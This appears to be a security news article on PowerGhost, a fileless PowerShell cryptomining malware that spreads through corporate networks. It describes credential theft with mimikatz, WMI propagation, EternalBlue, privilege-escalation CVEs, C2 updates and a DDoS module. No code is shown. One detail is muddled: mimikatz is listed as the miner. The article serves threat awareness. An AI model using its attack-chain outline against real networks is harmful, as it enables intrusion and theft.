Newly discovered PowerGhost Malware Spreading across corporate networks that infecting corporate networks both workstations and servers to illegally mining the crypt-currency and Perform DDoS Attacks.
Cybercriminals targeting large number corporate networks to mining the cryptocurrency and DDoS attack to generate huge profits.
In this case, attackers using fileless malware techniques to maintain the persistence and it used to bypass the antivirus detection and leverage the corporate vulnerabilities using known exploits such as Eternalblue.
PowerGhost malware miner is encountered most often in India, Brazil, Columbia, and Turkey and infected a large number of corporate companies local area networks.
PowerGhost Malware Infection Techniques
Initially, victims affected using remote administration tools or remotely using exploits and the PowerShell scripts will download the miner’s and immediately launches it into the hard drive.
PowerGhost act as an Obfuscated PowerShell scripts that contains a number of core modules such as miners, libraries for mining operations and PE file injection for Eternalblue exploit.
- Miner – mimikatz
- libraries – msvcp120.dll and msvcr120.dll
- PE injection and shellcode
Scripts performing the several stages and it is capable of self-update its module that keeps checking its C2 server, if it found any, then it automatically update itself.
According to kaspersky , With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI and download the miner body from C2 server.
PowerGhost try to spread across the local network using the EternalBlue exploit (MS17-010, CVE-2017-0144).
Later it escalates its privileges when it landing into the new system with the 32- or 64-bit exploits for MS16-032, MS15-051, and CVE-2018-8120. Finally, the script launches the miner by loading a PE file via reflective PE injection.
Researchers also found a tool for conducting DDoS attacks in one of the PowerGhost version to make extra money along with the mining operation profit.
Indicators of compromise